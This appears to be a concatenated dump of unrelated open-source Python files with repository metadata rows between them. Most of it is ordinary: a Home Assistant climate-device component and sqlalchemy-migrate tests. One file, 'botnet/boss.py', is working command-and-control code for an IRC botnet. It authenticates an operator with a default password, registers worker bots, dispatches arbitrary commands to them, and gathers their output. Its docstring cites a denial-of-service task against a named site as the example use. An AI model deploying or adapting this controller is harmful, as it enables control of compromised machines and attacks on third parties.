nvpair.has_meta_attribute(resource_element, "attr_name")
)
| gpl-2.0 | 7,737,838,643,891,636,000 | 32.02004 | 79 | 0.468532 | false |
partofthething/home-assistant | homeassistant/components/climate/__init__.py | 16 | 16930 | """Provides functionality to interact with climate devices."""
from abc import abstractmethod
from datetime import timedelta
import functools as ft
import logging
from typing import Any, Dict, List, Optional
import voluptuous as vol
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_TENTHS,
PRECISION_WHOLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_ON,
TEMP_CELSIUS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
make_entity_service_schema,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.temperature import display_temp as show_temp
from homeassistant.helpers.typing import ConfigType, HomeAssistantType, ServiceDataType
from homeassistant.util.temperature import convert as convert_temperature
from .const import (
ATTR_AUX_HEAT,
ATTR_CURRENT_HUMIDITY,
ATTR_CURRENT_TEMPERATURE,
ATTR_FAN_MODE,
ATTR_FAN_MODES,
ATTR_HUMIDITY,
ATTR_HVAC_ACTION,
ATTR_HVAC_MODE,
ATTR_HVAC_MODES,
ATTR_MAX_HUMIDITY,
ATTR_MAX_TEMP,
ATTR_MIN_HUMIDITY,
ATTR_MIN_TEMP,
ATTR_PRESET_MODE,
ATTR_PRESET_MODES,
ATTR_SWING_MODE,
ATTR_SWING_MODES,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
ATTR_TARGET_TEMP_STEP,
DOMAIN,
HVAC_MODE_COOL,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
HVAC_MODES,
SERVICE_SET_AUX_HEAT,
SERVICE_SET_FAN_MODE,
SERVICE_SET_HUMIDITY,
SERVICE_SET_HVAC_MODE,
SERVICE_SET_PRESET_MODE,
SERVICE_SET_SWING_MODE,
SERVICE_SET_TEMPERATURE,
SUPPORT_AUX_HEAT,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_SWING_MODE,
SUPPORT_TARGET_HUMIDITY,
SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_RANGE,
)
DEFAULT_MIN_TEMP = 7
DEFAULT_MAX_TEMP = 35
DEFAULT_MIN_HUMIDITY = 30
DEFAULT_MAX_HUMIDITY = 99
ENTITY_ID_FORMAT = DOMAIN + ".{}"
SCAN_INTERVAL = timedelta(seconds=60)
CONVERTIBLE_ATTRIBUTE = [ATTR_TEMPERATURE, ATTR_TARGET_TEMP_LOW, ATTR_TARGET_TEMP_HIGH]
_LOGGER = logging.getLogger(__name__)
SET_TEMPERATURE_SCHEMA = vol.All(
cv.has_at_least_one_key(
ATTR_TEMPERATURE, ATTR_TARGET_TEMP_HIGH, ATTR_TARGET_TEMP_LOW
),
make_entity_service_schema(
{
vol.Exclusive(ATTR_TEMPERATURE, "temperature"): vol.Coerce(float),
vol.Inclusive(ATTR_TARGET_TEMP_HIGH, "temperature"): vol.Coerce(float),
vol.Inclusive(ATTR_TARGET_TEMP_LOW, "temperature"): vol.Coerce(float),
vol.Optional(ATTR_HVAC_MODE): vol.In(HVAC_MODES),
}
),
)
async def async_setup(hass: HomeAssistantType, config: ConfigType) -> bool:
"""Set up climate entities."""
component = hass.data[DOMAIN] = EntityComponent(
_LOGGER, DOMAIN, hass, SCAN_INTERVAL
)
await component.async_setup(config)
component.async_register_entity_service(SERVICE_TURN_ON, {}, "async_turn_on")
component.async_register_entity_service(SERVICE_TURN_OFF, {}, "async_turn_off")
component.async_register_entity_service(
SERVICE_SET_HVAC_MODE,
{vol.Required(ATTR_HVAC_MODE): vol.In(HVAC_MODES)},
"async_set_hvac_mode",
)
component.async_register_entity_service(
SERVICE_SET_PRESET_MODE,
{vol.Required(ATTR_PRESET_MODE): cv.string},
"async_set_preset_mode",
[SUPPORT_PRESET_MODE],
)
component.async_register_entity_service(
SERVICE_SET_AUX_HEAT,
{vol.Required(ATTR_AUX_HEAT): cv.boolean},
async_service_aux_heat,
[SUPPORT_AUX_HEAT],
)
component.async_register_entity_service(
SERVICE_SET_TEMPERATURE,
SET_TEMPERATURE_SCHEMA,
async_service_temperature_set,
[SUPPORT_TARGET_TEMPERATURE, SUPPORT_TARGET_TEMPERATURE_RANGE],
)
component.async_register_entity_service(
SERVICE_SET_HUMIDITY,
{vol.Required(ATTR_HUMIDITY): vol.Coerce(float)},
"async_set_humidity",
[SUPPORT_TARGET_HUMIDITY],
)
component.async_register_entity_service(
SERVICE_SET_FAN_MODE,
{vol.Required(ATTR_FAN_MODE): cv.string},
"async_set_fan_mode",
[SUPPORT_FAN_MODE],
)
component.async_register_entity_service(
SERVICE_SET_SWING_MODE,
{vol.Required(ATTR_SWING_MODE): cv.string},
"async_set_swing_mode",
[SUPPORT_SWING_MODE],
)
return True
async def async_setup_entry(hass: HomeAssistantType, entry):
"""Set up a config entry."""
return await hass.data[DOMAIN].async_setup_entry(entry)
async def async_unload_entry(hass: HomeAssistantType, entry):
"""Unload a config entry."""
return await hass.data[DOMAIN].async_unload_entry(entry)
class ClimateEntity(Entity):
"""Representation of a climate entity."""
@property
def state(self) -> str:
"""Return the current state."""
return self.hvac_mode
@property
def precision(self) -> float:
"""Return the precision of the system."""
if self.hass.config.units.temperature_unit == TEMP_CELSIUS:
return PRECISION_TENTHS
return PRECISION_WHOLE
@property
def capability_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the capability attributes."""
supported_features = self.supported_features
data = {
ATTR_HVAC_MODES: self.hvac_modes,
ATTR_MIN_TEMP: show_temp(
self.hass, self.min_temp, self.temperature_unit, self.precision
),
ATTR_MAX_TEMP: show_temp(
self.hass, self.max_temp, self.temperature_unit, self.precision
),
}
if self.target_temperature_step:
data[ATTR_TARGET_TEMP_STEP] = self.target_temperature_step
if supported_features & SUPPORT_TARGET_HUMIDITY:
data[ATTR_MIN_HUMIDITY] = self.min_humidity
data[ATTR_MAX_HUMIDITY] = self.max_humidity
if supported_features & SUPPORT_FAN_MODE:
data[ATTR_FAN_MODES] = self.fan_modes
if supported_features & SUPPORT_PRESET_MODE:
data[ATTR_PRESET_MODES] = self.preset_modes
if supported_features & SUPPORT_SWING_MODE:
data[ATTR_SWING_MODES] = self.swing_modes
return data
@property
def state_attributes(self) -> Dict[str, Any]:
"""Return the optional state attributes."""
supported_features = self.supported_features
data = {
ATTR_CURRENT_TEMPERATURE: show_temp(
self.hass,
self.current_temperature,
self.temperature_unit,
self.precision,
),
}
if supported_features & SUPPORT_TARGET_TEMPERATURE:
data[ATTR_TEMPERATURE] = show_temp(
self.hass,
self.target_temperature,
self.temperature_unit,
self.precision,
)
if supported_features & SUPPORT_TARGET_TEMPERATURE_RANGE:
data[ATTR_TARGET_TEMP_HIGH] = show_temp(
self.hass,
self.target_temperature_high,
self.temperature_unit,
self.precision,
)
data[ATTR_TARGET_TEMP_LOW] = show_temp(
self.hass,
self.target_temperature_low,
self.temperature_unit,
self.precision,
)
if self.current_humidity is not None:
data[ATTR_CURRENT_HUMIDITY] = self.current_humidity
if supported_features & SUPPORT_TARGET_HUMIDITY:
data[ATTR_HUMIDITY] = self.target_humidity
if supported_features & SUPPORT_FAN_MODE:
data[ATTR_FAN_MODE] = self.fan_mode
if self.hvac_action:
data[ATTR_HVAC_ACTION] = self.hvac_action
if supported_features & SUPPORT_PRESET_MODE:
data[ATTR_PRESET_MODE] = self.preset_mode
if supported_features & SUPPORT_SWING_MODE:
data[ATTR_SWING_MODE] = self.swing_mode
if supported_features & SUPPORT_AUX_HEAT:
data[ATTR_AUX_HEAT] = STATE_ON if self.is_aux_heat else STATE_OFF
return data
@property
def temperature_unit(self) -> str:
"""Return the unit of measurement used by the platform."""
raise NotImplementedError()
@property
def current_humidity(self) -> Optional[int]:
"""Return the current humidity."""
return None
@property
def target_humidity(self) -> Optional[int]:
"""Return the humidity we try to reach."""
return None
@property
@abstractmethod
def hvac_mode(self) -> str:
"""Return hvac operation ie. heat, cool mode.
Need to be one of HVAC_MODE_*.
"""
@property
@abstractmethod
def hvac_modes(self) -> List[str]:
"""Return the list of available hvac operation modes.
Need to be a subset of HVAC_MODES.
"""
@property
def hvac_action(self) -> Optional[str]:
"""Return the current running hvac operation if supported.
Need to be one of CURRENT_HVAC_*.
"""
return None
@property
def current_temperature(self) -> Optional[float]:
"""Return the current temperature."""
return None
@property
def target_temperature(self) -> Optional[float]:
"""Return the temperature we try to reach."""
return None
@property
def target_temperature_step(self) -> Optional[float]:
"""Return the supported step of target temperature."""
return None
@property
def target_temperature_high(self) -> Optional[float]:
"""Return the highbound target temperature we try to reach.
Requires SUPPORT_TARGET_TEMPERATURE_RANGE.
"""
raise NotImplementedError
@property
def target_temperature_low(self) -> Optional[float]:
"""Return the lowbound target temperature we try to reach.
Requires SUPPORT_TARGET_TEMPERATURE_RANGE.
"""
raise NotImplementedError
@property
def preset_mode(self) -> Optional[str]:
"""Return the current preset mode, e.g., home, away, temp.
Requires SUPPORT_PRESET_MODE.
"""
raise NotImplementedError
@property
def preset_modes(self) -> Optional[List[str]]:
"""Return a list of available preset modes.
Requires SUPPORT_PRESET_MODE.
"""
raise NotImplementedError
@property
def is_aux_heat(self) -> Optional[bool]:
"""Return true if aux heater.
Requires SUPPORT_AUX_HEAT.
"""
raise NotImplementedError
@property
def fan_mode(self) -> Optional[str]:
"""Return the fan setting.
Requires SUPPORT_FAN_MODE.
"""
raise NotImplementedError
@property
def fan_modes(self) -> Optional[List[str]]:
"""Return the list of available fan modes.
Requires SUPPORT_FAN_MODE.
"""
raise NotImplementedError
@property
def swing_mode(self) -> Optional[str]:
"""Return the swing setting.
Requires SUPPORT_SWING_MODE.
"""
raise NotImplementedError
@property
def swing_modes(self) -> Optional[List[str]]:
"""Return the list of available swing modes.
Requires SUPPORT_SWING_MODE.
"""
raise NotImplementedError
def set_temperature(self, **kwargs) -> None:
"""Set new target temperature."""
raise NotImplementedError()
async def async_set_temperature(self, **kwargs) -> None:
"""Set new target temperature."""
await self.hass.async_add_executor_job(
ft.partial(self.set_temperature, **kwargs)
)
def set_humidity(self, humidity: int) -> None:
"""Set new target humidity."""
raise NotImplementedError()
async def async_set_humidity(self, humidity: int) -> None:
"""Set new target humidity."""
await self.hass.async_add_executor_job(self.set_humidity, humidity)
def set_fan_mode(self, fan_mode: str) -> None:
"""Set new target fan mode."""
raise NotImplementedError()
async def async_set_fan_mode(self, fan_mode: str) -> None:
"""Set new target fan mode."""
await self.hass.async_add_executor_job(self.set_fan_mode, fan_mode)
def set_hvac_mode(self, hvac_mode: str) -> None:
"""Set new target hvac mode."""
raise NotImplementedError()
async def async_set_hvac_mode(self, hvac_mode: str) -> None:
"""Set new target hvac mode."""
await self.hass.async_add_executor_job(self.set_hvac_mode, hvac_mode)
def set_swing_mode(self, swing_mode: str) -> None:
"""Set new target swing operation."""
raise NotImplementedError()
async def async_set_swing_mode(self, swing_mode: str) -> None:
"""Set new target swing operation."""
await self.hass.async_add_executor_job(self.set_swing_mode, swing_mode)
def set_preset_mode(self, preset_mode: str) -> None:
"""Set new preset mode."""
raise NotImplementedError()
async def async_set_preset_mode(self, preset_mode: str) -> None:
"""Set new preset mode."""
await self.hass.async_add_executor_job(self.set_preset_mode, preset_mode)
def turn_aux_heat_on(self) -> None:
"""Turn auxiliary heater on."""
raise NotImplementedError()
async def async_turn_aux_heat_on(self) -> None:
"""Turn auxiliary heater on."""
await self.hass.async_add_executor_job(self.turn_aux_heat_on)
def turn_aux_heat_off(self) -> None:
"""Turn auxiliary heater off."""
raise NotImplementedError()
async def async_turn_aux_heat_off(self) -> None:
"""Turn auxiliary heater off."""
await self.hass.async_add_executor_job(self.turn_aux_heat_off)
async def async_turn_on(self) -> None:
"""Turn the entity on."""
if hasattr(self, "turn_on"):
# pylint: disable=no-member
await self.hass.async_add_executor_job(self.turn_on)
return
# Fake turn on
for mode in (HVAC_MODE_HEAT_COOL, HVAC_MODE_HEAT, HVAC_MODE_COOL):
if mode not in self.hvac_modes:
continue
await self.async_set_hvac_mode(mode)
break
async def async_turn_off(self) -> None:
"""Turn the entity off."""
if hasattr(self, "turn_off"):
# pylint: disable=no-member
await self.hass.async_add_executor_job(self.turn_off)
return
# Fake turn off
if HVAC_MODE_OFF in self.hvac_modes:
await self.async_set_hvac_mode(HVAC_MODE_OFF)
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
raise NotImplementedError()
@property
def min_temp(self) -> float:
"""Return the minimum temperature."""
return convert_temperature(
DEFAULT_MIN_TEMP, TEMP_CELSIUS, self.temperature_unit
)
@property
def max_temp(self) -> float:
"""Return the maximum temperature."""
return convert_temperature(
DEFAULT_MAX_TEMP, TEMP_CELSIUS, self.temperature_unit
)
@property
def min_humidity(self) -> int:
"""Return the minimum humidity."""
return DEFAULT_MIN_HUMIDITY
@property
def max_humidity(self) -> int:
"""Return the maximum humidity."""
return DEFAULT_MAX_HUMIDITY
async def async_service_aux_heat(
entity: ClimateEntity, service: ServiceDataType
) -> None:
"""Handle aux heat service."""
if service.data[ATTR_AUX_HEAT]:
await entity.async_turn_aux_heat_on()
else:
await entity.async_turn_aux_heat_off()
async def async_service_temperature_set(
entity: ClimateEntity, service: ServiceDataType
) -> None:
"""Handle set temperature service."""
hass = entity.hass
kwargs = {}
for value, temp in service.data.items():
if value in CONVERTIBLE_ATTRIBUTE:
kwargs[value] = convert_temperature(
temp, hass.config.units.temperature_unit, entity.temperature_unit
)
else:
kwargs[value] = temp
await entity.async_set_temperature(**kwargs)
class ClimateDevice(ClimateEntity):
"""Representation of a climate entity (for backwards compatibility)."""
def __init_subclass__(cls, **kwargs):
"""Print deprecation warning."""
super().__init_subclass__(**kwargs)
_LOGGER.warning(
"ClimateDevice is deprecated, modify %s to extend ClimateEntity",
cls.__name__,
)
| mit | -1,336,920,128,390,001,400 | 29.44964 | 87 | 0.620555 | false |
undu/irc | botnet/boss.py | 1 | 12237 | #!/usr/bin/env python
import gevent
import logging
import os
import random
import re
import sys
import time
from gevent import socket
from gevent.event import Event
from gevent.queue import Queue
from logging.handlers import RotatingFileHandler
from optparse import OptionParser
from irc import IRCConnection, IRCBot
class BotnetWorker(object):
"""\
Simple class to track available workers
"""
def __init__(self, nick, name):
self.nick = nick
self.name = name
self.awaiting_ping = Event()
class Task(object):
"""\
A single command sent to any number of workers. Serves as the storage for
any results returned by the workers.
"""
_id = 0
def __init__(self, command):
"""\
Initialize the Task with a command, where the command is a string
representing the action to be taken, i.e. `dos charlesleifer.com`
"""
self.command = command
Task._id += 1
self.id = Task._id
self.data = {}
self.workers = set()
self.finished = set()
def add(self, nick):
"""\
Indicate that the worker with given nick is performing this task
"""
self.data[nick] = ''
self.workers.add(nick)
def done(self, nick):
"""\
Indicate that the worker with the given nick has finished this task
"""
self.finished.add(nick)
def is_finished(self):
return self.finished == self.workers
class BotnetBot(IRCBot):
"""\
Command and control bot for a simple Botnet
"""
def __init__(self, conn, secret, channel):
# initialize connection and register callbacks via parent class
super(BotnetBot, self).__init__(conn)
# store secret used for authentication and nick of administrator
self.secret = secret
self.boss = None
# store channels -- possibly use random channel for the command channel?
self.channel = channel
self.cmd_channel = channel + '-cmd'
# store worker bots in a dictionary keyed by nickname
self.workers = {}
# used for uptime
self.start = time.time()
# start a greenlet that periodically checks worker health
self.start_worker_health_greenlet()
# store tasks in a dictionary keyed by task id
self.tasks = {}
# get a logger instance piggy-backing off the underlying connection's
# get_logger() method - this logger will be used to store data from
# the workers
self.logger = self.get_data_logger()
# grab a reference to the connection logger for logging server state
self.conn_logger = self.conn.logger
# join the two channels
self.conn.join(self.channel)
self.conn.join(self.cmd_channel)
def get_data_logger(self):
return self.conn.get_logger('botnet.botnetbot.data.logger', 'botnet.data.log')
def send_workers(self, msg):
"""\
Convenience method to send data to the workers via command channel
"""
self.respond(msg, self.cmd_channel)
def send_user(self, msg):
"""\
Convenience method to send data to the administrator via the normal channel
"""
self.respond(msg, self.channel)
def start_worker_health_greenlet(self):
"""\
Start a greenlet that monitors workers' health
"""
gevent.spawn(self._worker_health_greenlet)
def _worker_health_greenlet(self):
while 1:
# broadcast a message to all workers
self.send_workers('!worker-ping')
# indicate that all workers are awaiting ping
for worker_nick in self.workers:
self.workers[worker_nick].awaiting_ping.set()
# wait two minutes
gevent.sleep(120)
dead = []
# find all workers who didn't respond to the ping
for worker_nick, worker in self.workers.items():
if worker.awaiting_ping.is_set():
self.conn_logger.warn('worker [%s] is dead' % worker_nick)
dead.append(worker_nick)
if dead:
self.send_user('Removed %d dead workers' % len(dead))
for nick in dead:
self.unregister(nick)
def require_boss(self, callback):
"""\
Callback decorator that enforces the calling user be botnet administrator
"""
def inner(nick, message, channel, *args, **kwargs):
if nick != self.boss:
return
return callback(nick, message, channel, *args, **kwargs)
return inner
def command_patterns(self):
return (
('\/join', self.join_handler),
('\/quit', self.quit_handler),
('!auth (?P<password>.+)', self.auth),
('!execute (?:(?P<num_workers>\d+)? )?(?P<command>.+)', self.require_boss(self.execute_task)),
('!print(?: (?P<task_id>\d+))?', self.require_boss(self.print_task)),
('!register (?P<hostname>.+)', self.register),
('!stop', self.require_boss(self.stop)),
('!status', self.require_boss(self.status)),
('!task-data (?P<task_id>\d+):(?P<data>.+)', self.task_data),
('!task-finished (?P<task_id>\d+)', self.task_finished),
('!task-received (?P<task_id>\d+)', self.task_received),
('!uptime', self.require_boss(self.uptime)),
('!worker-pong (?P<hostname>.+)', self.worker_health_handler),
('!help', self.require_boss(self.help)),
)
def join_handler(self, nick, message, channel):
self.logger.debug('%s joined #%s' % (nick, channel))
def quit_handler(self, nick, message, channel):
if channel == self.cmd_channel and nick in self.workers:
self.logger.info('Worker %s left, unregistering' % (nick))
self.unregister(nick)
def auth(self, nick, message, channel, password):
if not self.boss and password == self.secret:
self.boss = nick
self.logger.info('%s authenticated successfully' % nick)
return 'Success'
else:
self.logger.error('%s failed to authenticate' % nick)
def execute_task(self, nick, message, channel, command, num_workers=None):
task = Task(command)
self.tasks[task.id] = task
if num_workers is None or int(num_workers) >= len(self.workers):
# short-hand way of sending to all workers
num_workers = len(self.workers)
self.send_workers('!worker-execute %s:%s' % (task.id, task.command))
else:
num_workers = int(num_workers)
available_workers = set(self.workers.keys())
sent = 0
msg_template = '!worker-execute (%%s) %s:%s' % (task.id, task.command)
max_msg_len = 400
msg_len = len(msg_template % '')
msg_diff = max_msg_len - msg_len
available = msg_diff
send_to = []
# batch up command to workers
while sent < num_workers:
worker_nick = available_workers.pop()
send_to.append(worker_nick)
sent += 1
available -= (len(worker_nick) + 1)
if available <= 0 or sent == num_workers:
self.send_workers(msg_template % (','.join(send_to)))
available = msg_diff
send_to = []
self.send_user('Scheduled task: "%s" with id %s [%d workers]' % (
task.command, task.id, num_workers
))
def execute_task_once(self, nick, message, channel, command):
task = Task(command)
self.tasks[task.id] = task
worker = self.workers[random.choice(self.workers.keys())]
self.send_user('Scheduled task: "%s" with id %s - worker: [%s:%s]' % (
task.command, task.id, worker.nick, worker.name
))
self.respond('!worker-execute %s:%s' % (task.id, task.command), nick=worker.nick)
def print_task(self, nick, message, channel, task_id=None):
if not self.tasks:
return 'No tasks to print'
task_id = int(task_id or max(self.tasks.keys()))
task = self.tasks[task_id]
def printer(task):
for nick, data in task.data.iteritems():
worker = self.workers[nick]
self.send_user('[%s:%s] - %s' % (worker.nick, worker.name, task.command))
for line in data.splitlines():
self.send_user(line.strip())
gevent.sleep(.2)
gevent.spawn(printer, task)
def uptime(self, nick, message, channel):
curr = time.time()
seconds_diff = curr - self.start
hours, remainder = divmod(seconds_diff, 3600)
minutes, seconds = divmod(remainder, 60)
return 'Uptime: %d:%02d:%02d' % (hours, minutes, seconds)
def register(self, nick, message, channel, hostname):
if nick not in self.workers:
self.workers[nick] = BotnetWorker(nick, hostname)
self.logger.info('added worker [%s]' % nick)
else:
self.logger.warn('already registered [%s]' % nick)
return '!register-success %s' % self.cmd_channel
def unregister(self, worker_nick):
del(self.workers[worker_nick])
def status(self, nick, message, channel):
self.send_user('%s workers available' % len(self.workers))
self.send_user('%s tasks have been scheduled' % len(self.tasks))
def stop(self, nick, message, channel):
self.send_workers('!worker-stop')
def task_data(self, nick, message, channel, task_id, data):
# add the data to the task's data
self.tasks[int(task_id)].data[nick] += '%s\n' % data
def task_finished(self, nick, message, channel, task_id):
task = self.tasks[int(task_id)]
task.done(nick)
self.conn_logger.info('task [%s] finished by worker %s' % (task.id, nick))
self.logger.info('%s:%s:%s' % (task.id, nick, task.data))
if task.is_finished():
self.send_user('Task %s completed by %s workers' % (task.id, len(task.data)))
def task_received(self, nick, message, channel, task_id):
task = self.tasks[int(task_id)]
task.add(nick)
self.conn_logger.info('task [%s] received by worker %s' % (task.id, nick))
def worker_health_handler(self, nick, message, channel, hostname):
if nick in self.workers:
self.workers[nick].awaiting_ping.clear()
self.logger.debug('Worker [%s] is alive' % nick)
else:
self.register(nick, message, channel, hostname)
def help(self, nick, message, channel, hostname):
self.send_user('!execute (num workers) <command> -- run "command" on workers')
self.send_user('!print (task id) -- print output of tasks or task with id')
self.send_user('!stop -- tell workers to stop their current task')
self.send_user('!status -- get status on workers and tasks')
self.send_user('!uptime -- boss uptime')
def get_parser():
parser = OptionParser(usage='%prog [options]')
parser.add_option('--server', '-s', dest='server', default='irc.freenode.net',
help='IRC server to connect to')
parser.add_option('--port', '-p', dest='port', default=6667,
help='Port to connect on', type='int')
parser.add_option('--nick', '-n', dest='nick', default='boss1337',
help='Nick to use')
parser.add_option('--secret', '-x', dest='secret', default='password')
parser.add_option('--channel', '-c', dest='channel', default='#botwars-test')
parser.add_option('--logfile', '-f', dest='logfile')
parser.add_option('--verbosity', '-v', dest='verbosity', default=1, type='int')
return parser
if __name__ == '__main__':
parser = get_parser()
(options, args) = parser.parse_args()
conn = IRCConnection(options.server, options.port, options.nick,
options.logfile, options.verbosity)
bot = BotnetBot(conn, options.secret, options.channel)
bot.run()
| mit | -2,717,471,571,980,936,000 | 33.962857 | 106 | 0.580534 | false |
andras-tim/sqlalchemy-migrate | migrate/tests/versioning/test_script.py | 63 | 10322 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import imp
import os
import sys
import shutil
import six
from migrate import exceptions
from migrate.versioning import version, repository
from migrate.versioning.script import *
from migrate.versioning.util import *
from migrate.tests import fixture
from migrate.tests.fixture.models import tmp_sql_table
class TestBaseScript(fixture.Pathed):
def test_all(self):
"""Testing all basic BaseScript operations"""
# verify / source / run
src = self.tmp()
open(src, 'w').close()
bscript = BaseScript(src)
BaseScript.verify(src)
self.assertEqual(bscript.source(), '')
self.assertRaises(NotImplementedError, bscript.run, 'foobar')
class TestPyScript(fixture.Pathed, fixture.DB):
cls = PythonScript
def test_create(self):
"""We can create a migration script"""
path = self.tmp_py()
# Creating a file that doesn't exist should succeed
self.cls.create(path)
self.assertTrue(os.path.exists(path))
# Created file should be a valid script (If not, raises an error)
self.cls.verify(path)
# Can't create it again: it already exists
self.assertRaises(exceptions.PathFoundError,self.cls.create,path)
@fixture.usedb(supported='sqlite')
def test_run(self):
script_path = self.tmp_py()
pyscript = PythonScript.create(script_path)
pyscript.run(self.engine, 1)
pyscript.run(self.engine, -1)
self.assertRaises(exceptions.ScriptError, pyscript.run, self.engine, 0)
self.assertRaises(exceptions.ScriptError, pyscript._func, 'foobar')
# clean pyc file
if six.PY3:
os.remove(imp.cache_from_source(script_path))
else:
os.remove(script_path + 'c')
# test deprecated upgrade/downgrade with no arguments
contents = open(script_path, 'r').read()
f = open(script_path, 'w')
f.write(contents.replace("upgrade(migrate_engine)", "upgrade()"))
f.close()
pyscript = PythonScript(script_path)
pyscript._module = None
try:
pyscript.run(self.engine, 1)
pyscript.run(self.engine, -1)
except exceptions.ScriptError:
pass
else:
self.fail()
def test_verify_notfound(self):
"""Correctly verify a python migration script: nonexistant file"""
path = self.tmp_py()
self.assertFalse(os.path.exists(path))
# Fails on empty path
self.assertRaises(exceptions.InvalidScriptError,self.cls.verify,path)
self.assertRaises(exceptions.InvalidScriptError,self.cls,path)
def test_verify_invalidpy(self):
"""Correctly verify a python migration script: invalid python file"""
path=self.tmp_py()
# Create empty file
f = open(path,'w')
f.write("def fail")
f.close()
self.assertRaises(Exception,self.cls.verify_module,path)
# script isn't verified on creation, but on module reference
py = self.cls(path)
self.assertRaises(Exception,(lambda x: x.module),py)
def test_verify_nofuncs(self):
"""Correctly verify a python migration script: valid python file; no upgrade func"""
path = self.tmp_py()
# Create empty file
f = open(path, 'w')
f.write("def zergling():\n\tprint('rush')")
f.close()
self.assertRaises(exceptions.InvalidScriptError, self.cls.verify_module, path)
# script isn't verified on creation, but on module reference
py = self.cls(path)
self.assertRaises(exceptions.InvalidScriptError,(lambda x: x.module),py)
@fixture.usedb(supported='sqlite')
def test_preview_sql(self):
"""Preview SQL abstract from ORM layer (sqlite)"""
path = self.tmp_py()
f = open(path, 'w')
content = '''
from migrate import *
from sqlalchemy import *
metadata = MetaData()
UserGroup = Table('Link', metadata,
Column('link1ID', Integer),
Column('link2ID', Integer),
UniqueConstraint('link1ID', 'link2ID'))
def upgrade(migrate_engine):
metadata.create_all(migrate_engine)
'''
f.write(content)
f.close()
pyscript = self.cls(path)
SQL = pyscript.preview_sql(self.url, 1)
self.assertEqualIgnoreWhitespace("""
CREATE TABLE "Link"
("link1ID" INTEGER,
"link2ID" INTEGER,
UNIQUE ("link1ID", "link2ID"))
""", SQL)
# TODO: test: No SQL should be executed!
def test_verify_success(self):
"""Correctly verify a python migration script: success"""
path = self.tmp_py()
# Succeeds after creating
self.cls.create(path)
self.cls.verify(path)
# test for PythonScript.make_update_script_for_model
@fixture.usedb()
def test_make_update_script_for_model(self):
"""Construct script source from differences of two models"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertTrue("['User'].create()" in source_script)
self.assertTrue("['User'].drop()" in source_script)
@fixture.usedb()
def test_make_update_script_for_equal_models(self):
"""Try to make update script from two identical models"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source + self.model_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertFalse('User.create()' in source_script)
self.assertFalse('User.drop()' in source_script)
@fixture.usedb()
def test_make_update_script_direction(self):
"""Check update scripts go in the right direction"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertTrue(0
< source_script.find('upgrade')
< source_script.find("['User'].create()")
< source_script.find('downgrade')
< source_script.find("['User'].drop()"))
def setup_model_params(self):
self.script_path = self.tmp_py()
self.repo_path = self.tmp()
self.first_model_path = os.path.join(self.temp_usable_dir, 'testmodel_first.py')
self.second_model_path = os.path.join(self.temp_usable_dir, 'testmodel_second.py')
self.base_source = """from sqlalchemy import *\nmeta = MetaData()\n"""
self.model_source = """
User = Table('User', meta,
Column('id', Integer, primary_key=True),
Column('login', Unicode(40)),
Column('passwd', String(40)),
)"""
self.repo = repository.Repository.create(self.repo_path, 'repo')
self.pyscript = PythonScript.create(self.script_path)
sys.modules.pop('testmodel_first', None)
sys.modules.pop('testmodel_second', None)
def write_file(self, path, contents):
f = open(path, 'w')
f.write(contents)
f.close()
class TestSqlScript(fixture.Pathed, fixture.DB):
@fixture.usedb()
def test_error(self):
"""Test if exception is raised on wrong script source"""
src = self.tmp()
f = open(src, 'w')
f.write("""foobar""")
f.close()
sqls = SqlScript(src)
self.assertRaises(Exception, sqls.run, self.engine)
@fixture.usedb()
def test_success(self):
"""Test sucessful SQL execution"""
# cleanup and prepare python script
tmp_sql_table.metadata.drop_all(self.engine, checkfirst=True)
script_path = self.tmp_py()
pyscript = PythonScript.create(script_path)
# populate python script
contents = open(script_path, 'r').read()
contents = contents.replace("pass", "tmp_sql_table.create(migrate_engine)")
contents = 'from migrate.tests.fixture.models import tmp_sql_table\n' + contents
f = open(script_path, 'w')
f.write(contents)
f.close()
# write SQL script from python script preview
pyscript = PythonScript(script_path)
src = self.tmp()
f = open(src, 'w')
f.write(pyscript.preview_sql(self.url, 1))
f.close()
# run the change
sqls = SqlScript(src)
sqls.run(self.engine)
tmp_sql_table.metadata.drop_all(self.engine, checkfirst=True)
@fixture.usedb()
def test_transaction_management_statements(self):
"""
Test that we can successfully execute SQL scripts with transaction
management statements.
"""
for script_pattern in (
"BEGIN TRANSACTION; %s; COMMIT;",
"BEGIN; %s; END TRANSACTION;",
"/* comment */BEGIN TRANSACTION; %s; /* comment */COMMIT;",
"/* comment */ BEGIN TRANSACTION; %s; /* comment */ COMMIT;",
"""
-- comment
BEGIN TRANSACTION;
%s;
-- comment
COMMIT;""",
):
test_statement = ("CREATE TABLE TEST1 (field1 int); "
"DROP TABLE TEST1")
script = script_pattern % test_statement
src = self.tmp()
with open(src, 'wt') as f:
f.write(script)
sqls = SqlScript(src)
sqls.run(self.engine)
| mit | 2,017,535,593,245,108,500 | 32.842623 | 92 | 0.608894 | false |
